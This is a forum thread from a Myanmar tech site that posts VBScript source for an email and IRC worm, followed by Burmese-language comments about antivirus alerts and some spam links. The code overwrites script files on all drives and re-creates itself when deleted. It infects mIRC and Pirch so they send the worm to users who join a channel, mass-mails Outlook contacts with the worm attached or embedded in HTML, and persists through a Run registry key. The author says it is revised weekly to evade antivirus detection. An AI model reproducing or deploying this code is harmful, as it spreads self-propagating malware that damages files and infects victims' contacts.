မင်္ဂလာပါ!

လှိုက်လှဲစွာကြိုဆိုပါသည်။ ယခု ပထမဆုံးအကြိမ် ရောက်ဖူးခြင်းဖြစ်ပါသလား? ဝင်ရောက် ဆွေးနွေး မေးမြန်းလိုပါလျှင် အောက်တွင်ဖော်ပြထားသော button များမှတဆင့် ဝင်ရောက် ဆွေးနွေးနိုင်သကဲ့သို့ အဖွဲ့ဝင်အသစ်အနေဖြင့်လည်း လျှောက်ထားနိုင်ပါတယ်။

MYSTERY ZILLION တွင် English သို့မဟုတ် Unicode ဖြင့်သာ အသုံးပြုခွင့်ရှိသည်။ ဇော်ဂျီ ၊ ဧရာ စသည်တို့ကို အသုံးပြုခွင့် မရှိ။ Unicode fonts များမှာ Mon3,Yunghkio, Myanamr3 စသည်များ အသုံးပြုနိုင်သည်။ Unicode Guide ကို ဒီမှာ Download ချပါ။ Zawgyi to Unicode Converter
Don't share ebook or software if nobody request. You can find free book websites on here. We are welcome for discussion or asking question instead.

VBS Code for Virus Creator

This function must be the last one called, cause it never ends.
If it detects that the file has been deleted, it creates it again.
[HIGHLIGHT="javascript"]_______________________________________________________________________
ВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇ
Function Antidelete()
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function
_______________________________________________________________________
ВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇ
These two funtions will search in all the HD for mirc.ini, Pirch32.exe,
vbs and vbe files. When its found any of them it calls the infection function.
_______________________________________________________________________
ВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇ
Function Dodrives()
On Error Resume Next
Set fso = CreateObject("scipting.filesystemobject")
Set Drives = fso.Drives
For Each Drive In Drives
If Drive.Drivetype = Remote Then
Drivefull = Drive & "\"
Call Subfolders(Drivefull)
ElseIf Drive.IsReady Then
Drivefull = Drive & "\"
Call Subfolders(Drivefull)
End If
Next
End Function
Function Subfolders(path)
newpath=path
Set Fold = fso.GetFolder(newpath)
Set Files = Fold.Files
For Each file In Files
If fso.GetExtensionName(file.path) = "vbs" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If fso.GetExtensionName(file.path) = "vbe" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If file.Name = "mirc.ini" Then
Mirc (file.ParentFolder)
End If
If file.Name = "Pirch32.exe" Then
Pirch (file.ParentFolder)
End If
Next
Set file = Fold.Subfolders
For Each Subfol In file
Call Subfolders(Subfol.path)
Next
End Function
_______________________________________________________________________
ВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇ
This function will infect mirc whit a simple script
_______________________________________________________________________
ВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇ
Function Mirc(Path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If Path = "" Then
If fso.fileexists("c:\mirc\mirc.ini") Then Path = "c:\mirc"
If fso.fileexists("c:\mirc32\mirc.ini") Then Path = "c:\mirc32"
PfDir = ws.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\ProgramFilesDir")
If fso.fileexists(PfDir & "\mirc\mirc.ini") Then Path = PfDir & "\mirc"
End If
If Path <> "" Then
Set Script = fso.CreateTextFile(Path & "\script.ini", True)
Script.writeline "[script]"
Script.writeline "n0=on 1:JOIN:#:{"
Script.writeline "n1= /if ( $nick == $me ) { halt }"
Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & "
send $nick c:\windows\worm.vbs"
Script.writeline "n3=}"
Script.Close
End If
End Function
_______________________________________________________________________
ВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇ
This function will send a message to each contact in the address list
with the worm attached.
i'm modifying this function once a week or so, cause avp is updating
his Heuristic I-Worms detection, and they detect the worm.
So, i'm making a version for week to avoid the detection
_______________________________________________________________________
ВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇ
Function Outlook()
On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If OutlookApp = "Outlook" Then
Set Mapi = OutlookApp.GetNameSpace("MAPI")
set mapiadlist as Mapi.AddressLists
For Each Addresslist In mapiadlist
If Addresslist.AddressEntries.Count <> 0 Then
Addresslistcout = Addresslist.AddressEntries.Count
For AddList = 1 To Addresslistcout
Set msg = OutlookApp.CreateItem(0)
Set AdEntries = Addresslist.AddressEntries(AddList)
msg.To = AdEntries.Address
msg.Subject = "Here you have, ;o)"
msg.Body = "Hi:" & vbCrLf & "Check This!"
set Attachs=msg.Attachments
Attachs.Add "c:\window\worm.vbs"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
End If
End Function
_______________________________________________________________________
ВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇ
This function will send a message to all the people in the address list with the worm
in the message body.
_______________________________________________________________________
ВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇ
Function OutlookBody()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
I = 1
Do While Myself.atendofstream = False
MyLine = Myself.readline
Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) & "&chr(34)&" & Chr(34))
Loop
Myself.Close
htm = "<" & "HTML><" & "HEAD><" & "META content=" & Chr(34) & " & chr(34) & " & Chr(34) & "text/html; charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><" & "META content=" & Chr(34) & "MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><" & "STYLE></" & "STYLE></" & "HEAD><" & "BODY bgColor=#ffffff><" & "SCRIPT language=vbscript>"
htm = htm & vbCrLf & "On Error Resume Next"
htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "scripting.filesystemobject" & Chr(34) & ")"
htm = htm & vbCrLf & "If Err.Number <> 0 Then"
htm = htm & vbCrLf & "document.write " & Chr(34) & "<font face='verdana' color=#ff0000 size='2'>You need ActiveX enabled if you want to see this e-mail.<br>Please open this message again and click accept ActiveX<br>Microsoft Outlook</font>" & Chr(34) & ""
htm = htm & vbCrLf & "Else"
htm = htm & vbCrLf & "Set vbs = fso.createtextfile(fso.getspecialfolder(0) & " & Chr(34) & "\Worm.vbs" & Chr(34) & ", True)"
htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34)
htm = htm & vbCrLf & "vbs.Close"
htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34) & ")"
htm = htm & vbCrLf & "ws.run fso.getspecialfolder(0) & " & Chr(34) & "\wscript.exe " & Chr(34) & " & fso.getspecialfolder(0) & " & Chr(34) & "\Worm.vbs %" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "This message has permanent errors.<br>Sorry<br>" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "End If"
htm2 = htm2 & vbCrLf & "<" & "/SCRIPT></" & "body></" & "html>"
HtmlBody = htm & htm2
Set mapi = Outlook.GetNameSpace("MAPI")
Set Mapiadd=mapi.AddressLists
For Each Addresslist In Mapiadd
If Addresslist.AddressEntries.Count <> 0 Then
AddCount = Addresslist.AddressEntries.Count
Set Msg = Outlook.CreateItem(0)
Msg.Subject = "Rv: 4You"
Msg.HtmlBody = HtmlBody
Msg.DeleteAfterSubmit = True
For II = 1 To AddCount
Set Addentry = Addresslist.AddressEntries(II)
If AddCount = 1 Then
Msg.BCC = Addentry.Address
Else
Msg.BCC = Msg.BCC & "; " & Addentry.Address
End If
Next
Msg.send
End If
Next
Outlook.Quit
End If
End Function
_______________________________________________________________________
ВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇ
This function will infect pirch whith a simple script
_______________________________________________________________________
ВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇ
Function Pirch(path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If path = "" Then
If fso.fileexists("c:\pirch\Pirch32.exe") Then path = "c:\pirch"
If fso.fileexists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32"
pfDir = ws.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If fso.fileexists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe"
End If
If path <> "" Then
Set Script = fso.CreateTextFile(path & "\events.ini", True)
Script.WriteLine "[Levels]"
Script.WriteLine "Enabled=1"
Script.WriteLine "Count=6"
Script.WriteLine "Level1=000-Unknowns"
Script.WriteLine "000-UnknownsEnabled=1"
Script.WriteLine "Level2=100-Level 100"
Script.WriteLine "100-Level 100Enabled=1"
Script.WriteLine "Level3=200-Level 200"
Script.WriteLine "200-Level 200Enabled=1"
Script.WriteLine "Level4=300-Level 300"
Script.WriteLine " 300-Level 300Enabled=1"
Script.WriteLine "Level5=400-Level 400 "
Script.WriteLine "400-Level 400Enabled=1"
Script.WriteLine "Level6=500-Level 500"
Script.WriteLine "500-Level 500Enabled=1"
Script.WriteLine ""
Script.WriteLine "[000-Unknowns]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[100-Level 100]"
Script.WriteLine "User1=*!*@*";
Script.WriteLine "UserCount=1"
Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick c:\windows\worm.vbs"
Script.WriteLine "EventCount=1"
Script.WriteLine ""
Script.WriteLine "[200-Level 200]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[300-Level 300]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[400-Level 400]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[500-Level 500]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.Close
End If
End Function
_______________________________________________________________________
ВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇ
With this two lines your worm will start with windows.
_______________________________________________________________________
ВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇ
Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\Worm.vbs %"
_______________________________________________________________________[/HIGHLIGHT]
ВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇВЇ
:106::106::106:

မှတ်ချက်များ

 • edited November 2009 Registered Users
  ဒီပိုစ့်ကိုကြည့်တဲ့သူတွေ ဘယ်လိုများကြည့်လဲတော့မသိဘူး ၊ NOD32 ကတော့ url address ကိုအဝင်တောင်မခံဘူး ။ Unknown script virus ဆိုတာချည်းပဲ ။ တာဝန်ရှိသူတွေ ကြည့်လုပ်ကြအုံး ။ :)
 • edited November 2009 Administrators
  Don't worry about that. ဒီ code တွေက အလုပ်မလုပ်ပါဘူး။ NOD က content ထဲမှာ virus script ပါလာရင် virus လို့သတ်မှတ်ပါတယ်။ ဒါကြောင့် ဖြစ်တာပါ။ အခု ကျွန်တော် အလုပ်မလုပ်အောင်တော့ နည်းနည်းပြင်လိုက်ပြီ။ စမ်းကြည့်လိုက်ပါအုံးဗျာ။
 • edited November 2009 Registered Users
  saturngod wrote: »
  Don't worry about that. ဒီ code တွေက အလုပ်မလုပ်ပါဘူး။ NOD က content ထဲမှာ virus script ပါလာရင် virus လို့သတ်မှတ်ပါတယ်။ ဒါကြောင့် ဖြစ်တာပါ။ အခု ကျွန်တော် အလုပ်မလုပ်အောင်တော့ နည်းနည်းပြင်လိုက်ပြီ။ စမ်းကြည့်လိုက်ပါအုံးဗျာ။

  စိတ်ကတော့မပူပါဘူး :D ၊ trojan လို့ပါတာတောင် AV ကို disabled လုပ်ပြီးစမ်းတာတွေအများကြီး :D
  ကျွန်တော်ပြောတာက အဲဒီ topic ကိုရောက်တာနဲ့ ဝင်လို့ကိုမရတော့အောင် AV ကကစ်လိုက်လို့ပါ ။ အခု
  လဲ မနေ့ကလိုပဲ ၊ ဝင်လို့မရသေးပါဘူး ။ AV ကို disabled လုပ်မှ ဝင်လို့ရပါတယ် ။ ကျေးဇူးပါ ကိုစေတန် ။
 • edited November 2009 Administrators
  အင်း... ကြည့်ရတာ AV က အရမ်း ကို restricted လုပ်ထားလို့နဲ့တူတယ်။ ဒီ content ကတော့ virus မဟုတ်တာသေချာပါတယ်။ ကျွန်တော်အရင်တုန်းက blog မှာ code တင်တုန်းကလည်း NOD က အဲလိုပဲ ပြတယ် :D ပြရင်လည်း ဝင်မကြည့်နဲ့ပေါ့.. :P ဒါမှမဟုတ် ပိတ်ပြီးတော့ ကြည့်ပေါ့... Kaspersky ကတော့ ပြမယ်မထင်ဘူး.. ဟိုအရင်တုန်းက 6 လောက်တုန်းကတော့ မပြဘူး.. အခုတော့ ဘယ်လိုနေလဲမသိဘူး..
 • edited November 2009 Registered Users
  saturngod wrote: »
  အင်း... ကြည့်ရတာ AV က အရမ်း ကို restricted လုပ်ထားလို့နဲ့တူတယ်။ ဒီ content ကတော့ virus မဟုတ်တာသေချာပါတယ်။ ကျွန်တော်အရင်တုန်းက blog မှာ code တင်တုန်းကလည်း NOD က အဲလိုပဲ ပြတယ် :D ပြရင်လည်း ဝင်မကြည့်နဲ့ပေါ့.. :P ဒါမှမဟုတ် ပိတ်ပြီးတော့ ကြည့်ပေါ့... Kaspersky ကတော့ ပြမယ်မထင်ဘူး.. ဟိုအရင်တုန်းက 6 လောက်တုန်းကတော့ မပြဘူး.. အခုတော့ ဘယ်လိုနေလဲမသိဘူး..

  ကြည့်ချင်လွန်းလို့ကို AV ကို disabled ပေးပြီးဝင်လာတာ :P ၊ ကျွန်တော်တစ်ယောက်ပဲဖြစ်တာလားတော့
  မသိဘူး ၊ တစ်ယောက်မှ ဘာမှပြောသံလဲမကြားဘူး ။ ဒါမှမဟုတ် NOD သုံးတဲ့သူပဲမရှိတာလားမသိဘူး :5::39: ။ အဲလိုပဲ NOD ကသွားရလာရ အဆင်ကိုမပြေဘူး ၊ အရေးအကြောင်းဆို သူကရှေ့ဆုံးက ပိတ်ပြစ်
  တယ် ။
 • edited November 2009 Registered Users
  saturngod wrote: »
  အင်း... ကြည့်ရတာ AV က အရမ်း ကို restricted လုပ်ထားလို့နဲ့တူတယ်။ ဒီ content ကတော့ virus မဟုတ်တာသေချာပါတယ်။ ကျွန်တော်အရင်တုန်းက blog မှာ code တင်တုန်းကလည်း NOD က အဲလိုပဲ ပြတယ် :D ပြရင်လည်း ဝင်မကြည့်နဲ့ပေါ့.. :P ဒါမှမဟုတ် ပိတ်ပြီးတော့ ကြည့်ပေါ့... Kaspersky ကတော့ ပြမယ်မထင်ဘူး.. ဟိုအရင်တုန်းက 6 လောက်တုန်းကတော့ မပြဘူး.. အခုတော့ ဘယ်လိုနေလဲမသိဘူး..

  Kaspersky ကတော့မပြပါဘူး၊ အေးဆေးပဲ။ KIS 2009 ကိုသုံးပါတယ်။:D
 • edited November 2009 Registered Users
  kyawmin wrote: »
  ကြည့်ချင်လွန်းလို့ကို AV ကို disabled ပေးပြီးဝင်လာတာ :P ၊ ကျွန်တော်တစ်ယောက်ပဲဖြစ်တာလားတော့
  မသိဘူး ၊ တစ်ယောက်မှ ဘာမှပြောသံလဲမကြားဘူး
  ။ ဒါမှမဟုတ် NOD သုံးတဲ့သူပဲမရှိတာလားမသိဘူး :5::39: ။ အဲလိုပဲ NOD ကသွားရလာရ အဆင်ကိုမပြေဘူး ၊ အရေးအကြောင်းဆို သူကရှေ့ဆုံးက ပိတ်ပြစ်တယ် ။

  ဒီ Thread တက်လာပြီး ဘယ်သူမှ ၀င်မရေးရသေးချိန်မှာ ကိုစေတန်ဆီ ကျွန်တော် pm ပို့ပြီး အသိပေးပါတယ်။ နောက် ကိုkyawmin post တက်လာတယ်။ ကိုစေတန် ရဲ့ post တက်လာတယ်။ ဖြစ်နေသေးတယ်လို့ ကျွန်တော်ထပ် pm ပို့ပါတယ်။ မည်သည့် အကြောင်းပြန်ကြားချက်မှ ပြန်မလာပါ။ အခု quote လုပ်ရေးတာကိုလည်း NOD က terminate လုပ်ခိုင်းပါတယ်။ ကိုkyawmin တစ်ယောက်တည်း ဖြစ်နေတာလို့ ထင်မှာစိုးလို့ terminate မလုပ်ဘဲ ၀င်ရေးတာပါ။

  NOD ကကျွန်တော်သုံးဖူးသမျှမှာ အဆင်အပြေဆုံးပါ ကိုkyawmin အခုဟာလည်း အကြောင်းရှိလို့ ဖြစ်မှာပါဗျာ။

  အပေါ်မှာ ကိုစေတန်ပြောတဲ့ ပြရင်လည်း ဝင်မကြည့်နဲ့ပေါ့ ဆိုတာကတော့ မဟုတ်သေးပါဘူး။ ဒါတာ၀န်ရှိတဲ့သူတစ်ယောက် ပြောရမယ့် စကားမဟုတ်ပါဘူး။
 • edited November 2009 Administrators
  ဒီ post ကို ကျွန်တော် သေသေချာချာ စစ်ပြီးပြီ။ kaspersky နဲ့ကလည်း မပြဘူးဗျ။ တနည်းပြောရင် NOD က အရမ်းတင်းကျပ်ထားလို့ ဖြစ်နေတာ။ တခြား Antivirus တွေ မဖြစ်ဘူး။ NOD က content တွေကိုပါ စစ်တယ်။ code run သည်ဖြစ်စေ မ run သည်ဖြစ်စေ content တွေမှာ code ပါရင် virus လို့သတ်မှတ်တယ်။ NOD နဲ့ဆိုင်တဲ့ ပြဿနာဆိုတော့ ကျွန်တော်လည်း မဖြေရှင်းနိုင်ပါ။ NOD ကို disable လုပ်ပြီး ကြည့်မယ်ဆိုရင်လည်း အခြားနေရာကနေ virus ဝင်သွားရင်လည်း မကောင်းဘူးလေ။ ဒီ post ကို ဖျက်ရအောင်လည်း virus မဟုတ်သလို အခြား ဘာ ရည်ရွယ်ချက်မှ မပါဘူး။ လေ့လာလို့ ရတဲ့ thread တစ်ခုပါ။ အခြားဖြေရှင်းနည်းမရှိလို့ပါ။ တကယ်လို့ မလုံခြုံဘူးလို့ ထင်ရင်တော့ မဝင်ကြည့်တာ အကောင်းဆုံးပဲဗျ။

  PS: ကျွန်တော့် blog မှာတုန်းက virus အလုပ်လုပ်ပုံကို code နဲ့ ရှင်းပြဘူးတယ်။ အဲတုန်းကလည်း NOD ရှိတဲ့လူတွေ တစ်ယောက်မှ ဝင်ဖတ်လို့မရဘူးဗျ။ အဲတုန်းကလည်း အခုလို NOD ကနေ virus ဆိုပြီး alert ပေးပါတယ်။
 • edited November 2009 Administrators
  အခု code လေးက အရမ်းရိုးလွန်းတယ်။ ဘယ် antivirus မဆို သိနိုင်တယ်။ outlook ရဲ့address book ကို ဖတ်လိုက်ပြီဆိုကတည်းက antivirus တွေ အကုန်ထအော်ကုန်မှာပါ။ code တစ်ခုလုံး စမ်းစရာမလိုဘူး... outlook address လေးကိုဖတ်တာလေးပဲ ခေါ်ကြည့်။ antivirus ကနေ virus လို့ ပြောပါလိမ့်မယ်။
 • edited November 2009 Registered Users
  Ye Htet wrote: »
  ဒီ thread တက်လာပြီး ဘယ်သူမှ ၀င်မရေးရသေးချိန်မှာ ကိုစေတန်ဆီ ကျွန်တော် pm ပို့ပြီး အသိပေးပါတယ်။ နောက် ကိုkyawmin post တက်လာတယ်။ ကိုစေတန် ရဲ့ post တက်လာတယ်။ ဖြစ်နေသေးတယ်လို့ ကျွန်တော်ထပ် pm ပို့ပါတယ်။ မည်သည့် အကြောင်းပြန်ကြားချက်မှ ပြန်မလာပါ။

  ကိုစေတန်ထံ မှ အကြောင်းပြန်ကြားချက် နှစ်စောင် လက်ခံရရှိပါသည်။ ကျွန်တော်မသိသေးသော nod နဲ့ပတ်သက်သည်များကိုလည်း ရှင်းပြထားပါတယ်။ ကျေးဇူးတင်ပါတယ်ဗျာ။
 • edited December 2009 Registered Users
  Kaspersky ကတော့မပြပါဘူး၊ အေးဆေးပဲ။ KIS 2009 ကိုသုံးပါတယ်။:D
  hhaa, interesting:)):)):))


  House MD DVD Box Sets
  Weeds DVD Box Set
  Doctor Who DVD Complete Seasons 1-4 Box Set
  Mash dvd complete seasons 1-11 box set
  CSI DVD set
  Boston Legal DVD box set
  Star Trek dvd box SET
Sign In or Register to comment.